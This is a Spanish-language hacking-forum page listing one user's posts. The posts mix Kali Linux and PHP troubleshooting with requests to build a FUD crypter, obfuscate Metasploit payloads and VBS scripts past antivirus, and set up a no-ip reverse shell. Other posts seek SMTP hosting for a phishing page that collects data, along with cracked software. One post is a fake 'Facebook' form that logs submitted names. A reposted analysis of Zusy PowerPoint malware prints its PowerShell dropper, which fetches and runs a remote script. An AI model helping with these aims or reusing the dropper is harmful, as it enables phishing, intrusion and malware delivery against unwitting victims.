Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - xhc1

#1
Amigos tengo un problema con la instalación  de kali linux,  quiero instalarlo  de manera persistente  en un pendrive. El error sucede después de montar la iso y crear la partición. Lo que hago es reiniciar  el equipo, elijo la unidad de arranque, etc. Pero cuando selecciono la opción (la que sea al iniciarse) me mande el mensaje "Xz-Compressed data is corrupt".  Lo que entiendo es que el programa  Win32  disk imager no hizo bien su trabajo, pero también lo intenté con rufus y nada.

Debo admitir  que el kali linux (ISO) que quiero montar quizás tenga un poco más de 2 años desde que lo descargue... se lo que van a decir, pero quiero estar seguro de que el problema no resida en alguna otra parte, y valla yo a descargar algo para nada. Si el error es que la iso es obsoleta pues es la primera vez que me sucede. Quiero sus consejos.
#2
el otro dia me tope con este libro,  EL GRAN LIBRO DE DEBIAN GNU/LINUX pdf aunque no he consegui aun un pdf por hay suelto, primera ves que me pasa eso  :-\

Bueno lo cierto esque quisiera poseer mas conocimiento a niveles profesionales de esta tematica, y si es orientado a debian mucho mejor, me consegui con un super pack en el foro pero el link a esta caido!! alguien lo habra duplicado por mega?
  :D
#3
Buenos dias ante todo, veran compañeros le realize mantenimiento a mi lapton, debido a ventilador, en esa parte normal, el problema surgio cuando volvi a usarla pues la distribucion que usa el kali linux y se activo el modo avion, lo cual no he podido desactivarlo; por algunos medios, ejemplo:

rfkill unblock wifi

rfkill unblock all

iwconfig wlan0 txpower on / este ultimo menos que menos no cambia de su estado off

No se espero me ayuden no se si instalar un driver wifi, no entiendo bien el problema o reinstallar kali cosa que es muy fastidiosa, que puedo hacer?  :-\
#4
Hola buen dia!

No manejo bien  c/c++ pero no es nada que unos manuales para conocer su estructura no resuelva ademas me han dicho que es un lenguaje muy robusto pero que librerias supongo tendria en mente para desarrollar crypter fud, que ese es mi interes en este lenguaje por ahora. ademas me voy por C o C++?
Me pueden orientar  :D
#5
Hace un tiempo lo usaba en mi maquina windows, ahora trato de usarlo pero ya no lo tengo crakeado y la version demo ya espiro y no me deja poder usarlo alguien sabe como puedo obtener la version funcional o alguna alternativa gratuita he igual de eficas

Gracias de ante mano
#6
Off Topic / Grupo de telegram
Julio 03, 2017, 09:50:33 AM
Existe un grupo de telegran si no es asi porque no hacer uno!! resulta muy practico pienso yo  8)
#7
Hola buenos dias

Alguna idea para desarrollar un bot para facebook que me permita publicar cada cierto tiempo, valga la rebundacia una publicacion determinada es decir un articulo de venta por ejemplo.

Alguien con experiencia en esto me puede decir bajo que lenguaje son hechos y si puedo usar python para tal tarea...
#8
Hola buenas tardes para todos!!

Estoy algo desorientado con esto, soy una de esas personas que cada dia trata de aprender mas y mas, entonces por ello actualmente cosa que no manejo es acerca de los conocimientos de metadatos consultados de alguna manera por editores hexadecimales, actualmente uso GHex..

Bueno apenas me consegui con 2 ejemplos para analisar algunos ficheros uno era de SQL y otro de ZIP, me enfocare en este ulimo... es decir no entiendo nadaaaaaa!!! xD sigo que CLARO esta la cabezera comienza con PK en ZIP y debe terminar asi, eso bien!!

Ahora el tuto me dice que el siguien grupo octal creo desde la posicion 5,6,7, lo marque con verde en la imagen deberia de tener esta escruptura XX 00 02 o XX 00 03, si es 02 no lleva pasword si es al contrario si lleva, aqui no se representa asi??

Por otro lado la tiempo original donde fue creado el fichero deberia de estar representado en la posicion 11 y 12, marca con rojo en la imagen quizas este bien pero no me explica bien como interpretarlo, esto pasa con todo, NO PUEDO SEGUIR LA SECUENCIA!!

Alguien me puede dar no se un libro con todo esta informacion, un taller algo que pueda yo abrir cualquier cosa sea pdf, zip, jpg, png, etc... y que pueda extraer estos metadatos, creo llamarlo asi por favor si no se consideran asi por favor correguirme!! se que muchos diran bueno pero hay herramientas como exiftoll pero no es lo mismo quiero ser un profesional a largo o mediano plazo por eso saber esto lo veo esencial mas cuando no estudias informatica como yo xD

#9
Disculpen la violacion de las politicas tal ves, pero me veo en la dificulta de poseerlo y los filtros que uso en google no me funcionan muy bien xD, estoy desarrollando una herramienta y tuve la oportunidad que tener un poco del libro lo que me facilito ver que hay unas partes que me serian de mucha ayuda :( por favor....

De ante mano muchas gracias. MP
#10
Hola!! nunca le he parado mucho a esas paginas de publicidad!! que a cambio te dan 0.0001$por ver cada una de las pg de publicidad, quiero saber si existe otros metodos un poco mas no se "menos ladilloso" quiero almenos conseguir 10$ de este modo primero para no gastar de mi dinero y segundo par invertir en criptomonedas tengo entendido que necesito alguito para comprar en el negocio de exchange, hablo de poloniex aunque hay otros parecidos, entonces que pagina o metodo para conseguir sea usd o criptomonedas sean bitcoins o altcoins para poder invertir luego...

Alguien con experiencia que me guie!! ;D
#11

A diferencia de otros archivos de Microsoft Office que contienen macros maliciosas, el documento que ha sido descubierto utiliza comandos PowerShell, y simplemente con pasar por encima el ratón de un enlace (mouse hover) se activa la secuencia del payload.


Una nueva variante de un malware llamado "Zusy" se ha encontrado en la propagación como un archivo de PowerPoint adjunto a correos electrónicos de spam con títulos como "Orden de Compra # 130527" y "Confirmación". Es interesante porque no requiere que el usuario habilite las macros para ejecutarse.




La mayoría del malware de Office se basa en que los usuarios activan las macros para descargar alguna carga útil ejecutable que hace la mayoría de las cosas maliciosas, pero este malware utiliza la función del programa externo en su lugar.

Este ataque explota una característica legítima de PowerPoint. Colocar el cursor sobre un hipervínculo en una presentación puede desencadenar macros, llevar al usuario a la siguiente diapositiva, reproducir un sonido, abrir una página web o abrir una aplicación externa. La mayoría de los ataques malware basados en documentos a través de PowerPoint usarían macros para descargar la carga maliciosa, pero ahora que Office bloquea macros por defecto y más usuarios saben que no las habilitan, los atacantes están buscando otras formas de engañar a los usuarios.

Cuando se abre el archivo malicioso de PowerPoint, muestra una pantalla con un solo enlace que dice "Cargando ... espere":

En caso de que la víctima pase el cursor del ratón por encima de este link se ejecutará un código malicioso que intentará conectarse a una página web para descargar malware en el ordenador. Por tanto, ni siquiera es necesario hacer clic en el enlace, un detalle que ha llamado la atención de los investigadores de seguridad.



    <a:hlinkMouseOver r:id="rId2" action="No tienes permitido ver los links. Registrarse o Entrar a mi cuenta>


En efecto se puede ejecutar un comando al pasar por encima de un enlace en un PowerPoint:

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


    ppaction://protocol 


Para usuarios con vista protegida deshabilitada o cuando los usuarios ignoran la ventana emergente y permiten que el código se ejecute, el código malicioso de PowerShell intentará conectarse a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y descargar otro archivo.

Y el comando desofuscado en PowerShell hace que visite la URL maligna (hxxp) que descarga un fichero .JSE
Esto indica que es un archivo JScript Encoded codificado que es ejecutado por WScript para descagar un fichero EXE

    powershell -NoP -NonI -W Hidden -Exec Bypass

     "IEX (New-Object System.Net.WebClient).

    DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\"$env:temp\ii.jse\");

     Invoke-Item \"$env:temp\ii.jse\""


Si el usuario tiene habilitada la función Vista protegida, que de acuerdo con Microsoft está activada por defecto tanto en Windows Defender como en Office 365, PowerPoint detendrá el ataque y mostrará un aviso de seguridad.

Algunos análisis completos y muestras del malware en inglés:

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Algunos expertos de seguridad aseguran que PowerPoint Viewer, al no ser compatible con la ejecución de programas externos, no está afectado por este fallo.

Fuentes:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#12
HOla!!
estoy analisando un poco las cosas y renovando otras, que piensan vbs es el que he usado para tal tarea haciendo de estos multiples tareas lo malo esque aveses me arroja error con algunas maquinas, que consideran que otro lenguaje es bueno claro esta con windows
#13
Ufs hace tiempo lo tenia y podia hacer mi pruebas,en fin esta ves retome mis pruebas e investigaciones y me encuentro que cuando voy a:
Citarhttp//:burp
me aparese otra pagina, en fin conocen otro metodo no oficial para tener el certificado y poder  trabajar con https.

Tambien si desconosco otra via para poder deshabilitar la funcionalidad del browers que claro bloquea el uso de esta herramienta. esto abierto a sugerencias!!

De ante mano gracias*
Saludos!!
#14
hola!

tengo este problema que me arroja mi codigo de php, quiero guardar los datos obtenidos en un fichero, pero parece increible como me arroja ese error no entiendo, me pueden ayudar :(

El error es el siguiente
Citar
Warning: fopen(/home/xc/resource.txt): failed to open stream: Permission denied in /var/www/html/AAa/env.php on line 21

Warning: fwrite() expects parameter 1 to be resource, boolean given in /var/www/html/AAa/env.php on line 22

Warning: fclose() expects parameter 1 to be resource, boolean given in /var/www/html/AAa/env.php on line 23

Código: php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>Facebook</title>
</head>

<body>
<?php

$Nombre = $_GET['nombre'];
$Email = $_GET['email'];

if ($Nombre=='' || $Email==''){

echo "<script>alert('Los campos marcados con * son obligatorios');location.href ='javascript:history.back()';</script>";

}else{
    $cv = fopen("/home/xhc1/resource.txt", "a");
    #coloco resource.txt , tambien coloco var/www/html/resource.txt y nada -.- detesto php -.-
    fwrite($cv, "$Nombre");
    fclose($cv);


   
}

?>
</body>
</html>


Gracias de ante mano soy muy torpe aveses con php
#15
Hola!!
Hace dias he retomado un proyecto usando python en el cual quiero crear una especie de programa con mis exploits favoritos y que mas uso, algo liviano, la parte complicada aqui esque desconosco las bibliotecas que me puedan ayudar a tal tarea, alguna referencia por donde comenzar
#16
Me pueden facilitar algunas guias para entender como funciona, ademas que herramientas por lo general se usan para descubrir subdominios  si valen la pena, bueno creo que es lo de menos quisiera entender como esque alguien se ase con el dominio del subdominio abandonado por asi decirlo creo!!
#17
Buen dia compas!!

les dejo este link para los que no se han topado con estos textos interesantes de owasp, pero tambien vengo a pedirles que si me pueden facilitar este otro
si es posible en español
Citar
The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws
-- en español  El Manual de Hacker de Aplicaciones Web: Encontrar y explotar defectos de seguridad
de este tipo Dafydd Stuttard y Marcus Pinto y coautora de burpsuite, o alguna guias completas acerca de burpsuite tambien me servirian mucho
Les agradesco mucho!!
el link que les comente es este
Código: php
https://www.owasp.org/images/8/80/Gu%C3%ADa_de_pruebas_de_OWASP_ver_3.0.pdf
#18
hola ante todo!

llegue rapidamente al ultimo nivel :P esque asta ahora las practicas y ofuscacion con codificacion ASCCI y decimal no he logrado saltarme el ultimo filtro, alguien lo ha completado? o sabe de algunos metodos diferentes de los planteados en owasp, necesito consejos avansados de este tipo de vulnerabilidad no son tan representativas como xss ya que el vector ataque son parecidos pero el hecho esque quiero aprender

html injection reflected get
#19
Hola!
tengo un problema de instalacion me encuentro que dvwa segun la documentacion me dice que no puedo usar este en versiones php 7 o posteriores el problema esque me han dicho que reempalazar php7 por una version anterior me joderia phpmyadmin, asi que no se que pensar necesito un laboratorio para practicar. uso kali linux 32 bits alguna sugerencia.... :(
#20


No es el eslogan veraniego de una marca de refrescos y tampoco, para fortuna de los que odian la aritmética, una nueva fórmula que estudiar. Mo Gawdat, ingeniero y ejecutivo de Google X, la sección más innovadora del buscador sabelotodo, ha creado el algoritmo de la felicidad. Es algo tan sencillo como restar a tu vida real las expectativas de cómo debe ser. Si el saldo es positivo, ¡bingo! Y si es negativo, lo sentimos: serás desgraciado para siempre.

Ser feliz parece fácil cuando, como Gawdat, uno tiene todo lo que desea, éxito y dinero a espuertas. La cosa cambia cuando tienes que probar de tu propia medicina, cual conejillo de indias. Eso le ocurrió a él: su hijo Ali, de 21 años, falleció durante una sencilla operación, lo que le empujó a reflexionar sobre la verdadera naturaleza de la felicidad.

Gawdat utiliza el archiconocido ejemplo del vaso con la mitad de agua para explicar su teoría. El secreto no es verlo medio vacío o medio lleno, como se suele decir, sino aceptar con gratitud el agua que tenemos.

Además, el de Palo Alto diferencia dos estados que suelen confundirse en el mundo actual: diversión y felicidad. La primera consiste en momentos pasajeros de euforia que camuflan nuestro verdadero ánimo. Mientras, ser feliz es un estado permanente y factible cuando se abandona la utópica creencia de que todo lo que deseamos es alcanzable: «La felicidad es ese estado pacífico y satisfecho en el que te dices: 'Me gusta el mundo tal y como está'».

Lo de Gawdet es la versión actualizada de un estado que los filósofos ansían desde siempre. Sócrates ya decía que el secreto de la felicidad no se encuentra en la búsqueda de más sino en disfrutar con menos. Mientras, Séneca calificaba de sabio a quien se contentaba con su suerte.

Pero, según los estudios de Gawdat, su fórmula tiene base científica. Al inducir al cerebro a percibir la realidad a través de su ecuación, se neutralizan los siete puntos negativos que éste tiene por naturaleza: filtrar, asumir, memorizar, predecir, etiquetar, emocionarse y exagerar. De este modo se alcanzaría la felicidad: vivir en plenitud aceptando tus propias circunstancias.

Todo esto lo recoge su libro Solve for Happy, que acaba de publicar en EEUU. Con él bajo el brazo, sin traje y corbata de firma, y vestido con su camiseta favorita de Pink Floyd, ahora se dedica a difundir esta fórmula mágica. Quiere conseguir 10 millones de personas felices en todo el mundo. Sus vídeos arrasan en las redes sociales y uno de ellos, de Channel 4, ya multiplica por cinco esa cifra.

Señores y señoras, hagan sus cálculos.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#21
No entiendo que tengo mal me puden ayudar

-la base de datos se llama "vuln"
-las tablas son basicamente name para nombres y pass para contraseñas
-el en html el name de  los input del formulario son llamados igual name y pass
Código: php

<?php
$usuario = $_POST["name"];
$pass = $_POST["pass"];

if(empty($usuario) || empty($pass)){
   header("Location: index.php");

exit();
}
#*****
mysql_connect("localhost","root","miclave") or die("Error al conectar " . mysql_error());
mysql_select_db("vuln") or die ("Error al seleccionar la Base de datos: " . mysql_error());

$result = mysql_query("SELECT * FROM username WHERE name ='" . $usuario . "'");

if($row = mysql_fetch_array($result)){
   if($row["pass"] == $pass){
      session_start();
      $_SESSION["usuario"] = $usuario;
      header("Location: welcome.html");
      else{
         header("Location: index.html");
         exit();
      }
   }else{
header("Location: index.html");
exit();
}


?>

por si no me entienden bien aqui es lo demas
Código: php

<div style="position: absolute; right: 10px; top: 40px;">
         <div style = "width:300px; border: solid 1px #333333; " align = "left">
            <div style = "background-color:#333333; color:#FFFFFF; padding:2px; "><b>Login</b></div>

            <div style = "margin:30px">
               
               <form action = "login.php" method = "POST">
                  <label>Usuario</label><input type = "text" name = "name" id="name" class = "box"/><br /><br />
                  <label>Password</label><input type = "password" id="pass" name = "pass" class = "box" /><br/><br />
                  <input type = "submit" value = " Submit "/><br />
               </form>
               
               <div style = "font-size:11px; color:#cc0000; margin-top:10px"><?php echo "Error no se pudo conectar"; ?></div>

            </div>

         </div>

      </div>


El problema esque cuando mando los datos por el formulario simplemente carga la pagina php  no ocurre nada mas....

#22
Hola!!
recientemente me tope con un libro muy chevre que creo que en el foro esta alojado se
llama Web hacking 101, o como hacer dinero con el hacking, jeje algo asi entonces me tope con una vulnerabilidad
muy poco explicada al mi parecer  claro esta es bueno  porque te hace pensar  es exelente  asi vamos aprendiendo. Pero creo que entendi mal al referirise que habia interceptado una accion concurrente del formulario, al validar este de alguna manera. Coloco su nueva linea maliciosa hacia el servidor, en otra linea mas adelante habla de "proxy html" la definicion de proxy es muy amplia hoy en dia decir que es un servidor  a tercero que atraves de el se mandan las solicitudes a otro como destino se queda corto.
Se me viene a la cabeza otras maneras pero esta no la entiendo como modifico la original....  :-\
Me ayudan!!
LINK
Código: php
https://hackerone.com/reports/9508932
del informe, no lo entiendo claramente
#23
hola!!

Estoy aprendiendo cada dia, tengo una duda me encuentro en una prueba de phishing, aver si he programado bien, ahora bien me recomiendan un buen  servicio de hosting gratuito que ofresca servicios SMTP bueno ustedes saben que servicios son los requeridos para cojer los datos  poderlos enviar al correo en fin me he topado con algunos pero me piden tarjetas otros son confusos  no vale la pena la inversion de tiempo etc, etc

de ante mano gracias!!
#24
se me disparo un comando de borrado de archivos ocultos en la parpeta principal de la cuenta root
ahora para diferenciar este de los comandos o de lo demas tengo que escribir siempre esto source ~/.bashrc
Como puedo solucionarlo ya estoy arto de escribirlo siempre....

Gracias!!
#25
Dudas y pedidos generales / duda NO-IP + payload
Abril 26, 2017, 08:31:35 AM
hola!!
8) 8)
tengo una duda que es important que la haga, me cree una cuenta no -ip ahora cuento con un host que esta ligado a mi maquina lo cual es la unica manera de procesar asta donde se una shell inversa, ahora bien coloque en la variable LHOST=cuenta.hopto.org, hasta hay todo bien pienso yo que registro la direccion en ese momento que utilizada dicho host. Entonces la preguta es  ;D esa ip establecida en el host cambiara en verdad a la actual en determinado momento, mi logica me dice que si pero como es muy serio lo que pienso hacer no quiero errores de ningun tipo.

Otra cosa tener NO -IP no es un peligro en terminos de anonimato??? :'(. Habra otros medios por el cual abrir una shell inversa en este caso con metasploit o bueno a la antiguita python, netcat, perl etc.... otros ???
#26
HOLA!!!

me pueden ayudar en la creacion de un script que verifique si hay un pendrive y de acuerdo a esto haga determinada accion, quiero hacerlo en perl no tengo mucha experiencia en perl valga la rebundancia, pero asi aprendo, si no bueno SH ni modo. es para SO del tipo linux ;D

les agradesco un mundo!!
esque no entiendo aun eso de establecer aciones directamente con el sistema operativo que variables tomar en cuenta bajo que librerias estan relacionadas directamente por ejemplo si mando una orden df -h sin un usb, guardaria los datos.txt como estandar sin usb localizados y lo compararia con ejecuciones del mismo cada cierto tiempo y si no fueran iguales aplicaria la orden final, pero lo veo muy sadico jajaj nada etico
#27
Alguien me ayuda en ofuscar un payload de metasploit manualmente esque tengo errores de instalacion con veil ademas hacer las cosas por nuestra cuenta te da ventaja en situaciones futuras, imagino que el codigo f. que arroja metasploit por defecto sin indicar una extension viene siendo un codigo de lenguaje maquina, rubby o C, no c alguien me guia al respecto??  :-\ 
#28
HOLA!! ;D
me siento genial en pertenecer a este foro pero entiendo que hay algunas preguntas fuertes que quizas no se puedan contestar aca y quiero evolucionar mas en mis conocimientos hasta ahora siento que los materiales de estudio son obsoletos hoy en dia sobre el hacking y metasploit es una ecelente herramienta y mi kali linux  es un amor, pero quiero pasar al siguiente nivel y dejar de ser un lamer mas. por eso quisiera entrar en un chat de hack activo en la deed web pero se me a dificultado un poco
alguien esta actualizado del tema o que me envie una invitacion por fissss, jaj que cursi sono....  ::)
de ante mano no quiero que mal entiendan mi peticion esto foro es super cool, gracias a el se bastante de alguns temas
#29
creo que el titulo lo deja claro pero como puedo entrar en dicha carpeta asta hora lo que me sale es acceso negado, hay alguna forma de pasar de ese punto sin necesidad de enviar un malware para que cambie las condiciones? otra pregunta cosa que se me ocurrio orita es.. existe un administrador estandar en todas las maquinas por asi decirlo que si logro tener dicha seccion tendria el permiso  :'(, tantas cosas pero quiero tener una base clara en mi cabeza acerca del tema. las maquinas trabajan con windows 7  ;)
#30
Como puedo ofuscar un archivo vbs el cual he creado recientemente, tal ves no me indiquen como evadir por completo un molesto "aveses" ANTIVIRUS. pero para hacerme una idea de como es o son los procedimientos... ;D
#31
Dudas y pedidos generales / Netbios-security
Abril 18, 2017, 06:29:21 AM
Hola a la comunidad tengo una intriga, pasa que un familiar mi pidio que le demostrara como un intruso, bueno un cliente de su ciber-cafe que el maneja fue capaz de entrar a la carpeta del disco de la pc principal. lo que se es que utilizo netbios ya todos aqui lo sabemos, ademas en esos casos la intrucion es mas que directa pero lo que me come la cabeza es que si no tenia permisos a determinada carpeta lo consiguio. Me pueden dar una guia como probablemente lo hizo de esta manera aprender a como evitarlo y ademas conocer un poco mas de las "seguridades" de windows, por cierto era una pc de win7 :-X